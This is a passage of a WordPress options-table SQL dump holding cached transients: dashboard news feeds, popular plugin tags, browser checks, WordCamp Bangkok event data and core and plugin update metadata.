2\";}}s:5:\"build\";i:1747212062;s:21:\"cache_expiration_time\";i:1758724880;s:23:\"__cache_expiration_time\";i:1758724880;}','off'),
(98850,'_transient_timeout_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1758724880','off'),
(98851,'_transient_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1758681680','off'),
(98852,'_transient_timeout_dash_v2_5d2670b4c64e1f9f9664e4a90c337814','1758724880','off'),
(98853,'_transient_dash_v2_5d2670b4c64e1f9f9664e4a90c337814','<div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'https://wordpress.org/news/2025/08/portland-welcomes-wcus-2025/\'>Portland Welcomes WordCamp US 2025: A Community Gathering</a></li><li><a class=\'rsswidget\' href=\'https://wordpress.org/news/2025/08/portland-are-you-ready-the-wcus-2025-schedule-has-arrived/\'>Portland, Are You Ready? The WCUS 2025 Schedule Has Arrived!</a></li></ul></div><div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'https://ma.tt/2025/09/ruby-drama/\'>Matt: Ruby Drama</a></li><li><a class=\'rsswidget\' href=\'https://openchannels.fm/why-open-source-matters-in-podcasting/\'>Open Channels FM: Why Open Source Matters in Podcasting</a></li><li><a class=\'rsswidget\' href=\'https://openchannels.fm/exploring-wordpress-textcasting-and-open-web-standards/\'>Open Channels FM: Exploring WordPress, Textcasting, and Open Web Standards</a></li></ul></div>','off'),
(98854,'_site_transient_timeout_poptags_40cd750bba9870f18aada2478b24840a','1758692488','off'),
(98855,'_site_transient_poptags_40cd750bba9870f18aada2478b24840a','O:8:\"stdClass\":100:{s:11:\"woocommerce\";a:3:{s:4:\"name\";s:11:\"woocommerce\";s:4:\"slug\";s:11:\"woocommerce\";s:5:\"count\";i:7436;}s:6:\"widget\";a:3:{s:4:\"name\";s:6:\"widget\";s:4:\"slug\";s:6:\"widget\";s:5:\"count\";i:4922;}s:4:\"post\";a:3:{s:4:\"name\";s:4:\"post\";s:4:\"slug\";s:4:\"post\";s:5:\"count\";i:2799;}s:5:\"admin\";a:3:{s:4:\"name\";s:5:\"admin\";s:4:\"slug\";s:5:\"admin\";s:5:\"count\";i:2751;}s:5:\"posts\";a:3:{s:4:\"name\";s:5:\"posts\";s:4:\"slug\";s:5:\"posts\";s:5:\"count\";i:2142;}s:9:\"shortcode\";a:3:{s:4:\"name\";s:9:\"shortcode\";s:4:\"slug\";s:9:\"shortcode\";s:5:\"count\";i:2097;}s:3:\"seo\";a:3:{s:4:\"name\";s:3:\"seo\";s:4:\"slug\";s:3:\"seo\";s:5:\"count\";i:2035;}s:8:\"comments\";a:3:{s:4:\"name\";s:8:\"comments\";s:4:\"slug\";s:8:\"comments\";s:5:\"count\";i:1956;}s:9:\"ecommerce\";a:3:{s:4:\"name\";s:9:\"ecommerce\";s:4:\"slug\";s:9:\"ecommerce\";s:5:\"count\";i:1663;}s:6:\"images\";a:3:{s:4:\"name\";s:6:\"images\";s:4:\"slug\";s:6:\"images\";s:5:\"count\";i:1636;}s:5:\"image\";a:3:{s:4:\"name\";s:5:\"image\";s:4:\"slug\";s:5:\"image\";s:5:\"count\";i:1614;}s:6:\"google\";a:3:{s:4:\"name\";s:6:\"google\";s:4:\"slug\";s:6:\"google\";s:5:\"count\";i:1560;}s:8:\"facebook\";a:3:{s:4:\"name\";s:8:\"facebook\";s:4:\"slug\";s:8:\"facebook\";s:5:\"count\";i:1514;}s:7:\"twitter\";a:3:{s:4:\"name\";s:7:\"twitter\";s:4:\"slug\";s:7:\"twitter\";s:5:\"count\";i:1514;}s:5:\"email\";a:3:{s:4:\"name\";s:5:\"email\";s:4:\"slug\";s:5:\"email\";s:5:\"count\";i:1488;}s:7:\"gallery\";a:3:{s:4:\"name\";s:7:\"gallery\";s:4:\"slug\";s:7:\"gallery\";s:5:\"count\";i:1353;}s:7:\"sidebar\";a:3:{s:4:\"name\";s:7:\"sidebar\";s:4:\"slug\";s:7:\"sidebar\";s:5:\"count\";i:1318;}s:8:\"security\";a:3:{s:4:\"name\";s:8:\"security\";s:4:\"slug\";s:8:\"security\";s:5:\"count\";i:1315;}s:5:\"login\";a:3:{s:4:\"name\";s:5:\"login\";s:4:\"slug\";s:5:\"login\";s:5:\"count\";i:1267;}s:6:\"social\";a:3:{s:4:\"name\";s:6:\"social\";s:4:\"slug\";s:6:\"social\";s:5:\"count\";i:1178;}s:4:\"page\";a:3:{s:4:\"name\";s:4:\"page\";s:4:\"slug\";s:4:\"page\";s:5:\"count\";i:1159;}s:7:\"payment\";a:3:{s:4:\"name\";s:7:\"payment\";s:4:\"slug\";s:7:\"payment\";s:5:\"count\";i:1062;}s:5:\"video\";a:3:{s:4:\"name\";s:5:\"video\";s:4:\"slug\";s:5:\"video\";s:5:\"count\";i:1060;}s:5:\"block\";a:3:{s:4:\"name\";s:5:\"block\";s:4:\"slug\";s:5:\"block\";s:5:\"count\";i:1056;}s:10:\"e-commerce\";a:3:{s:4:\"name\";s:10:\"e-commerce\";s:4:\"slug\";s:10:\"e-commerce\";s:5:\"count\";i:1052;}s:9:\"analytics\";a:3:{s:4:\"name\";s:9:\"analytics\";s:4:\"slug\";s:9:\"analytics\";s:5:\"count\";i:1049;}s:9:\"gutenberg\";a:3:{s:4:\"name\";s:9:\"gutenberg\";s:4:\"slug\";s:9:\"gutenberg\";s:5:\"count\";i:1018;}s:7:\"widgets\";a:3:{s:4:\"name\";s:7:\"widgets\";s:4:\"slug\";s:7:\"widgets\";s:5:\"count\";i:1009;}s:9:\"elementor\";a:3:{s:4:\"name\";s:9:\"elementor\";s:4:\"slug\";s:9:\"elementor\";s:5:\"count\";i:976;}s:7:\"content\";a:3:{s:4:\"name\";s:7:\"content\";s:4:\"slug\";s:7:\"content\";s:5:\"count\";i:958;}s:6:\"slider\";a:3:{s:4:\"name\";s:6:\"slider\";s:4:\"slug\";s:6:\"slider\";s:5:\"count\";i:946;}s:15:\"payment-gateway\";a:3:{s:4:\"name\";s:15:\"payment gateway\";s:4:\"slug\";s:15:\"payment-gateway\";s:5:\"count\";i:932;}s:5:\"links\";a:3:{s:4:\"name\";s:5:\"links\";s:4:\"slug\";s:5:\"links\";s:5:\"count\";i:930;}s:4:\"spam\";a:3:{s:4:\"name\";s:4:\"spam\";s:4:\"slug\";s:4:\"spam\";s:5:\"count\";i:914;}s:4:\"form\";a:3:{s:4:\"name\";s:4:\"form\";s:4:\"slug\";s:4:\"form\";s:5:\"count\";i:913;}s:5:\"media\";a:3:{s:4:\"name\";s:5:\"media\";s:4:\"slug\";s:5:\"media\";s:5:\"count\";i:881;}s:6:\"search\";a:3:{s:4:\"name\";s:6:\"search\";s:4:\"slug\";s:6:\"search\";s:5:\"count\";i:862;}s:6:\"editor\";a:3:{s:4:\"name\";s:6:\"editor\";s:4:\"slug\";s:6:\"editor\";s:5:\"count\";i:809;}s:10:\"buddypress\";a:3:{s:4:\"name\";s:10:\"buddypress\";s:4:\"slug\";s:10:\"buddypress\";s:5:\"count\";i:785;}s:12:\"contact-form\";a:3:{s:4:\"name\";s:12:\"contact form\";s:4:\"slug\";s:12:\"contact-form\";s:5:\"count\";i:780;}s:4:\"menu\";a:3:{s:4:\"name\";s:4:\"menu\";s:4:\"slug\";s:4:\"menu\";s:5:\"count\";i:768;}s:3:\"rss\";a:3:{s:4:\"name\";s:3:\"rss\";s:4:\"slug\";s:3:\"rss\";s:5:\"count\";i:767;}s:5:\"embed\";a:3:{s:4:\"name\";s:5:\"embed\";s:4:\"slug\";s:5:\"embed\";s:5:\"count\";i:756;}s:5:\"pages\";a:3:{s:4:\"name\";s:5:\"pages\";s:4:\"slug\";s:5:\"pages\";s:5:\"count\";i:756;}s:4:\"feed\";a:3:{s:4:\"name\";s:4:\"feed\";s:4:\"slug\";s:4:\"feed\";s:5:\"count\";i:721;}s:8:\"category\";a:3:{s:4:\"name\";s:8:\"category\";s:4:\"slug\";s:8:\"category\";s:5:\"count\";i:713;}s:4:\"ajax\";a:3:{s:4:\"name\";s:4:\"ajax\";s:4:\"slug\";s:4:\"ajax\";s:5:\"count\";i:699;}s:11:\"performance\";a:3:{s:4:\"name\";s:11:\"performance\";s:4:\"slug\";s:11:\"performance\";s:5:\"count\";i:683;}s:3:\"api\";a:3:{s:4:\"name\";s:3:\"api\";s:4:\"slug\";s:3:\"api\";s:5:\"count\";i:676;}s:8:\"shipping\";a:3:{s:4:\"name\";s:8:\"shipping\";s:4:\"slug\";s:8:\"shipping\";s:5:\"count\";i:676;}s:7:\"youtube\";a:3:{s:4:\"name\";s:7:\"youtube\";s:4:\"slug\";s:7:\"youtube\";s:5:\"count\";i:675;}s:4:\"chat\";a:3:{s:4:\"name\";s:4:\"chat\";s:4:\"slug\";s:4:\"chat\";s:5:\"count\";i:673;}s:6:\"jquery\";a:3:{s:4:\"name\";s:6:\"jquery\";s:4:\"slug\";s:6:\"jquery\";s:5:\"count\";i:665;}s:9:\"marketing\";a:3:{s:4:\"name\";s:9:\"marketing\";s:4:\"slug\";s:9:\"marketing\";s:5:\"count\";i:649;}s:2:\"ai\";a:3:{s:4:\"name\";s:2:\"AI\";s:4:\"slug\";s:2:\"ai\";s:5:\"count\";i:649;}s:9:\"affiliate\";a:3:{s:4:\"name\";s:9:\"affiliate\";s:4:\"slug\";s:9:\"affiliate\";s:5:\"count\";i:644;}s:9:\"dashboard\";a:3:{s:4:\"name\";s:9:\"dashboard\";s:4:\"slug\";s:9:\"dashboard\";s:5:\"count\";i:637;}s:10:\"responsive\";a:3:{s:4:\"name\";s:10:\"responsive\";s:4:\"slug\";s:10:\"responsive\";s:5:\"count\";i:637;}s:3:\"css\";a:3:{s:4:\"name\";s:3:\"css\";s:4:\"slug\";s:3:\"css\";s:5:\"count\";i:636;}s:14:\"contact-form-7\";a:3:{s:4:\"name\";s:14:\"contact form 7\";s:4:\"slug\";s:14:\"contact-form-7\";s:5:\"count\";i:626;}s:4:\"link\";a:3:{s:4:\"name\";s:4:\"link\";s:4:\"slug\";s:4:\"link\";s:5:\"count\";i:620;}s:10:\"javascript\";a:3:{s:4:\"name\";s:10:\"javascript\";s:4:\"slug\";s:10:\"javascript\";s:5:\"count\";i:616;}s:5:\"share\";a:3:{s:4:\"name\";s:5:\"share\";s:4:\"slug\";s:5:\"share\";s:5:\"count\";i:609;}s:7:\"contact\";a:3:{s:4:\"name\";s:7:\"contact\";s:4:\"slug\";s:7:\"contact\";s:5:\"count\";i:608;}s:6:\"events\";a:3:{s:4:\"name\";s:6:\"events\";s:4:\"slug\";s:6:\"events\";s:5:\"count\";i:600;}s:5:\"forms\";a:3:{s:4:\"name\";s:5:\"forms\";s:4:\"slug\";s:5:\"forms\";s:5:\"count\";i:597;}s:6:\"blocks\";a:3:{s:4:\"name\";s:6:\"blocks\";s:4:\"slug\";s:6:\"blocks\";s:5:\"count\";i:592;}s:3:\"ads\";a:3:{s:4:\"name\";s:3:\"ads\";s:4:\"slug\";s:3:\"ads\";s:5:\"count\";i:588;}s:7:\"comment\";a:3:{s:4:\"name\";s:7:\"comment\";s:4:\"slug\";s:7:\"comment\";s:5:\"count\";i:579;}s:5:\"theme\";a:3:{s:4:\"name\";s:5:\"theme\";s:4:\"slug\";s:5:\"theme\";s:5:\"count\";i:579;}s:6:\"custom\";a:3:{s:4:\"name\";s:6:\"custom\";s:4:\"slug\";s:6:\"custom\";s:5:\"count\";i:578;}s:5:\"popup\";a:3:{s:4:\"name\";s:5:\"popup\";s:4:\"slug\";s:5:\"popup\";s:5:\"count\";i:577;}s:10:\"categories\";a:3:{s:4:\"name\";s:10:\"categories\";s:4:\"slug\";s:10:\"categories\";s:5:\"count\";i:569;}s:8:\"calendar\";a:3:{s:4:\"name\";s:8:\"calendar\";s:4:\"slug\";s:8:\"calendar\";s:5:\"count\";i:567;}s:8:\"payments\";a:3:{s:4:\"name\";s:8:\"payments\";s:4:\"slug\";s:8:\"payments\";s:5:\"count\";i:558;}s:6:\"button\";a:3:{s:4:\"name\";s:6:\"button\";s:4:\"slug\";s:6:\"button\";s:5:\"count\";i:556;}s:4:\"user\";a:3:{s:4:\"name\";s:4:\"user\";s:4:\"slug\";s:4:\"user\";s:5:\"count\";i:536;}s:5:\"users\";a:3:{s:4:\"name\";s:5:\"users\";s:4:\"slug\";s:5:\"users\";s:5:\"count\";i:532;}s:4:\"tags\";a:3:{s:4:\"name\";s:4:\"tags\";s:4:\"slug\";s:4:\"tags\";s:5:\"count\";i:527;}s:10:\"newsletter\";a:3:{s:4:\"name\";s:10:\"newsletter\";s:4:\"slug\";s:10:\"newsletter\";s:5:\"count\";i:522;}s:10:\"navigation\";a:3:{s:4:\"name\";s:10:\"navigation\";s:4:\"slug\";s:10:\"navigation\";s:5:\"count\";i:516;}s:6:\"mobile\";a:3:{s:4:\"name\";s:6:\"mobile\";s:4:\"slug\";s:6:\"mobile\";s:5:\"count\";i:509;}s:8:\"tracking\";a:3:{s:4:\"name\";s:8:\"tracking\";s:4:\"slug\";s:8:\"tracking\";s:5:\"count\";i:504;}s:12:\"social-media\";a:3:{s:4:\"name\";s:12:\"social media\";s:4:\"slug\";s:12:\"social-media\";s:5:\"count\";i:500;}s:8:\"checkout\";a:3:{s:4:\"name\";s:8:\"checkout\";s:4:\"slug\";s:8:\"checkout\";s:5:\"count\";i:497;}s:7:\"gateway\";a:3:{s:4:\"name\";s:7:\"gateway\";s:4:\"slug\";s:7:\"gateway\";s:5:\"count\";i:476;}s:5:\"stats\";a:3:{s:4:\"name\";s:5:\"stats\";s:4:\"slug\";s:5:\"stats\";s:5:\"count\";i:471;}s:12:\"notification\";a:3:{s:4:\"name\";s:12:\"notification\";s:4:\"slug\";s:12:\"notification\";s:5:\"count\";i:471;}s:6:\"import\";a:3:{s:4:\"name\";s:6:\"import\";s:4:\"slug\";s:6:\"import\";s:5:\"count\";i:470;}s:8:\"redirect\";a:3:{s:4:\"name\";s:8:\"redirect\";s:4:\"slug\";s:8:\"redirect\";s:5:\"count\";i:469;}s:10:\"statistics\";a:3:{s:4:\"name\";s:10:\"statistics\";s:4:\"slug\";s:10:\"statistics\";s:5:\"count\";i:464;}s:9:\"slideshow\";a:3:{s:4:\"name\";s:9:\"slideshow\";s:4:\"slug\";s:9:\"slideshow\";s:5:\"count\";i:459;}s:5:\"photo\";a:3:{s:4:\"name\";s:5:\"photo\";s:4:\"slug\";s:5:\"photo\";s:5:\"count\";i:457;}s:5:\"cache\";a:3:{s:4:\"name\";s:5:\"cache\";s:4:\"slug\";s:5:\"cache\";s:5:\"count\";i:444;}s:4:\"news\";a:3:{s:4:\"name\";s:4:\"news\";s:4:\"slug\";s:4:\"news\";s:5:\"count\";i:440;}s:6:\"photos\";a:3:{s:4:\"name\";s:6:\"photos\";s:4:\"slug\";s:6:\"photos\";s:5:\"count\";i:430;}s:4:\"code\";a:3:{s:4:\"name\";s:4:\"code\";s:4:\"slug\";s:4:\"code\";s:5:\"count\";i:427;}s:10:\"shortcodes\";a:3:{s:4:\"name\";s:10:\"shortcodes\";s:4:\"slug\";s:10:\"shortcodes\";s:5:\"count\";i:423;}s:7:\"plugins\";a:3:{s:4:\"name\";s:7:\"plugins\";s:4:\"slug\";s:7:\"plugins\";s:5:\"count\";i:418;}s:9:\"multisite\";a:3:{s:4:\"name\";s:9:\"multisite\";s:4:\"slug\";s:9:\"multisite\";s:5:\"count\";i:417;}}','off'),
(98879,'_site_transient_timeout_browser_ce69b851c4edc7eebfb3998aa94a7157','1759287818','off'),
(98880,'_site_transient_browser_ce69b851c4edc7eebfb3998aa94a7157','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:9:\"138.0.0.0\";s:8:\"platform\";s:9:\"Macintosh\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','off'),
(98881,'_site_transient_timeout_community-events-d46f8d1dfcf9d20f7d23023ee4ca73cf','1758726239','off'),
(98882,'_site_transient_community-events-d46f8d1dfcf9d20f7d23023ee4ca73cf','a:4:{s:9:\"sandboxed\";b:0;s:5:\"error\";N;s:8:\"location\";a:1:{s:2:\"ip\";s:9:\"1.2.185.0\";}s:6:\"events\";a:1:{i:0;a:10:{s:4:\"type\";s:8:\"wordcamp\";s:5:\"title\";s:21:\"WordCamp Bangkok 2025\";s:3:\"url\";s:34:\"https://bangkok.wordcamp.org/2025/\";s:6:\"meetup\";N;s:10:\"meetup_url\";N;s:4:\"date\";s:19:\"2025-12-13 00:00:00\";s:8:\"end_date\";s:19:\"2025-12-14 00:00:00\";s:20:\"start_unix_timestamp\";i:1765558800;s:18:\"end_unix_timestamp\";i:1765645200;s:8:\"location\";a:4:{s:8:\"location\";s:17:\"Bangkok, Thailand\";s:7:\"country\";s:2:\"TH\";s:8:\"latitude\";d:13.7352502;s:9:\"longitude\";d:100.5296482;}}}}','off'),
(98898,'_site_transient_timeout_browser_3ade46e10ab46df1d7d395ddaa715a24','1759292420','off'),
(98899,'_site_transient_browser_3ade46e10ab46df1d7d395ddaa715a24','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:9:\"140.0.0.0\";s:8:\"platform\";s:9:\"Macintosh\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','off'),
(98927,'_site_transient_timeout_community-events-7cb5a18eac573c1fd927da6eb9c6449c','1758734907','off'),
(98928,'_site_transient_community-events-7cb5a18eac573c1fd927da6eb9c6449c','a:4:{s:9:\"sandboxed\";b:0;s:5:\"error\";N;s:8:\"location\";a:1:{s:2:\"ip\";s:10:\"1.46.130.0\";}s:6:\"events\";a:1:{i:0;a:10:{s:4:\"type\";s:8:\"wordcamp\";s:5:\"title\";s:21:\"WordCamp Bangkok 2025\";s:3:\"url\";s:34:\"https://bangkok.wordcamp.org/2025/\";s:6:\"meetup\";N;s:10:\"meetup_url\";N;s:4:\"date\";s:19:\"2025-12-13 00:00:00\";s:8:\"end_date\";s:19:\"2025-12-14 00:00:00\";s:20:\"start_unix_timestamp\";i:1765558800;s:18:\"end_unix_timestamp\";i:1765645200;s:8:\"location\";a:4:{s:8:\"location\";s:17:\"Bangkok, Thailand\";s:7:\"country\";s:2:\"TH\";s:8:\"latitude\";d:13.7352502;s:9:\"longitude\";d:100.5296482;}}}}','off'),
(98932,'_site_transient_timeout_theme_roots','1758693630','off'),
(98933,'_site_transient_theme_roots','a:1:{s:5:\"plant\";s:7:\"/themes\";}','off'),
(98937,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.8.2.zip\";s:6:\"locale\";s:2:\"th\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.8.2.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.8.2-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.8.2-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.8.2\";s:7:\"version\";s:5:\"6.8.2\";s:11:\"php_version\";s:6:\"7.2.24\";s:13:\"mysql_version\";s:5:\"5.5.5\";s:11:\"new_bundled\";s:3:\"6.7\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1758691842;s:15:\"version_checked\";s:5:\"6.8.2\";s:12:\"translations\";a:0:{}}','off'),
(98938,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1758691844;s:8:\"response\";a:1:{s:55:\"nextend-smart-slider3-pro/nextend-smart-slider3-pro.php\";O:8:\"stdClass\":17:{s:4:\"name\";s:20:\"Smart Slider 3 - Pro\";s:4:\"slug\";s:25:\"nextend-smart-slider3-pro\";s:7:\"version\";s:8:\"3.5.1.29\";s:11:\"new_version\";s:8:\"3.5.1.29\";s:6:\"author\";s:45:\"<a href=\"https://nextendweb.com/\">Nextend</a>\";s:14:\"author_profile\";s:41:\"https://profiles.wordpress.org/nextendweb\";s:12:\"contributors\";a:1:{s:10:\"nextendweb\";a:3:{s:7:\"profile\";s:41:\"https://profiles.wordpress.org/nextendweb\";s:6:\"avatar\";s:82:\"http://2.gravatar.com/avatar/8db8e39a6001f1387425b0b72d7e43a0?s=96&d=monsterid&r=g\";s:12:\"display_name\";s:10:\"Nextendweb\";}}s:8:\"requires\";s:3:\"4.9\";s:12:\"requires_php\";s:5:\"7.0.0\";s:6:\"tested\";s:5:\"6.8.2\";s:5:\"icons\";a:3:{s:2:\"1x\";s:67:\"https://ps.w.org/smart-slider-3/assets/icon-256x256.png?rev=2307688\";s:2:\"2x\";s:67:\"https://ps.w.org/smart-slider-3/assets/icon-256x256.png?rev=2307688\";s:7:\"default\";s:59:\"https://ps.w.org/smart-slider-3/assets/icon.svg?rev=2307688\";}s:7:\"banners\";a:2:{s:3:\"low\";s:69:\"https://ps.w.org/smart-slider-3/assets/banner-772x250.png?rev=2307688\";s:4:\"high\";s:70:\"https://ps.w.org/smart-slider-3/assets/banner-1544x500.png?rev=2307688\";}s:8:\"sections\";a:1:{s:9:\"changelog\";s:105:\"<a href=\"https://smartslider.helpscoutdocs.com/article/1746-changelog\" target=\"_blank\">View changelog</a>\";}s:6:\"plugin\";s:55:\"nextend-smart-slider3-pro/nextend-smart-slider3-pro.php\";s:7:\"package\";s:157:\"https://api.nextendweb.com/v1/?action=update&channel=stable&product=smartslider3&pro=1&version=3.5.1.19&domain=pakhaeng.ssk.in.th&license=&platform=wordpress\";s:13:\"download_link\";s:157:\"https://api.nextendweb.com/v1/?action=update&channel=stable&product=smartslider3&pro=1&version=3.5.1.19&domain=pakhaeng.ssk.in.th&license=&platform=wordpress\";s:8:\"versions\";a:1:{s:8:\"3.5.1.29\";s:157:\"https://api.nextendweb.com/v1/?action=update&channel=stable&product=smartslider3&pro=1&version=3.5.1.19&domain=pakhaeng.ssk.in.th&license=&platform=wordpress\";}}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:19:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:3:\"5.5\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/plugin/akismet.5.5.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:60:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=2818463\";s:2:\"1x\";s:60:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=2818463\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/akismet/assets/banner-1544x500.png?rev=2900731\";s:2:\"1x\";s:62:\"https://ps.w.org/akismet/assets/banner-772x250.png?rev=2900731\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.8\";}s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:37:\"w.org/plugins/all-in-one-wp-migration\";s:4:\"slug\";s:23:\"all-in-one-wp-migration\";s:6:\"plugin\";s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";s:11:\"new_version\";s:4:\"7.99\";s:3:\"url\";s:54:\"https://wordpress.org/plugins/all-in-one-wp-migration/\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/plugin/all-in-one-wp-migration.7.99.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/all-in-one-wp-migration/assets/icon-256x256.png?rev=2458334\";s:2:\"1x\";s:76:\"https://ps.w.org/all-in-one-wp-migration/assets/icon-128x128.png?rev=2458334\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/all-in-one-wp-migration/assets/banner-1544x500.png?rev=3264554\";s:2:\"1x\";s:78:\"https://ps.w.org/all-in-one-wp-migration/assets/banner-772x250.png?rev=3264554\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.3\";}s:59:\"content-views-query-and-display-post-page/content-views.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:55:\"w.org/plugins/content-views-query-and-display-post-page\";s:4:\"slug\";s:41:\"content-views-query-and-display-post-page\";s:6:\"plugin\";s:59:\"content-views-query-and-display-post-page/content-views.php\";s:11:\"new_version\";s:3:\"4.2\";s:3:\"url\";s:72:\"https://wordpress.org/plugins/content-views-query-and-display-post-page/\";s:7:\"package\";s:88:\"https://downloads.wordpress.org/plugin/content-views-query-and-display-post-page.4.2.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:86:\"https://ps.w.org/content-views-query-and-display-post-page/assets/icon.svg?rev=2932226\";s:3:\"svg\";s:86:\"https://ps.w.org/content-views-query-and-display-post-page/assets/icon.svg?rev=2932226\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:96:\"https://ps.w.org/content-views-query-and-display-post-page/assets/banner-772x250.png?rev=3118830\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.3\";}s:23:\"elementor/elementor.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:23:\"w.org/plugins/elementor\";s:4:\"slug\";s:9:\"elementor\";s:6:\"plugin\";s:23:\"elementor/elementor.php\";s:11:\"new_version\";s:6:\"3.32.2\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/elementor/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.32.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:62:\"https://ps.w.org/elementor/assets/icon-256x256.gif?rev=3111597\";s:2:\"1x\";s:62:\"https://ps.w.org/elementor/assets/icon-128x128.gif?rev=3111597\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=3164133\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=3164133\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.6\";}s:25:\"embedpress/embedpress.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:24:\"w.org/plugins/embedpress\";s:4:\"slug\";s:10:\"embedpress\";s:6:\"plugin\";s:25:\"embedpress/embedpress.php\";s:11:\"new_version\";s:5:\"4.4.1\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/embedpress/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/embedpress.4.4.1.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:63:\"https://ps.w.org/embedpress/assets/icon-128x128.gif?rev=3301347\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/embedpress/assets/banner-1544x500.gif?rev=3149183\";s:2:\"1x\";s:65:\"https://ps.w.org/embedpress/assets/banner-772x250.gif?rev=3149183\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";}s:25:\"forminator/forminator.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:24:\"w.org/plugins/forminator\";s:4:\"slug\";s:10:\"forminator\";s:6:\"plugin\";s:25:\"forminator/forminator.php\";s:11:\"new_version\";s:6:\"1.47.0\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/forminator/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/forminator.1.47.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/forminator/assets/icon-256x256.png?rev=2746202\";s:2:\"1x\";s:63:\"https://ps.w.org/forminator/assets/icon-128x128.png?rev=2746202\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/forminator/assets/banner-1544x500.png?rev=2626060\";s:2:\"1x\";s:65:\"https://ps.w.org/forminator/assets/banner-772x250.png?rev=2626060\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.4\";}s:25:\"generateblocks/plugin.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:28:\"w.org/plugins/generateblocks\";s:4:\"slug\";s:14:\"generateblocks\";s:6:\"plugin\";s:25:\"generateblocks/plugin.php\";s:11:\"new_version\";s:5:\"2.1.1\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/generateblocks/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/generateblocks.2.1.1.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:59:\"https://ps.w.org/generateblocks/assets/icon.svg?rev=3239461\";s:3:\"svg\";s:59:\"https://ps.w.org/generateblocks/assets/icon.svg?rev=3239461\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/generateblocks/assets/banner-1544x500.png?rev=3239461\";s:2:\"1x\";s:69:\"https://ps.w.org/generateblocks/assets/banner-772x250.png?rev=3239461\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.5\";}s:33:\"kadence-blocks/kadence-blocks.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:28:\"w.org/plugins/kadence-blocks\";s: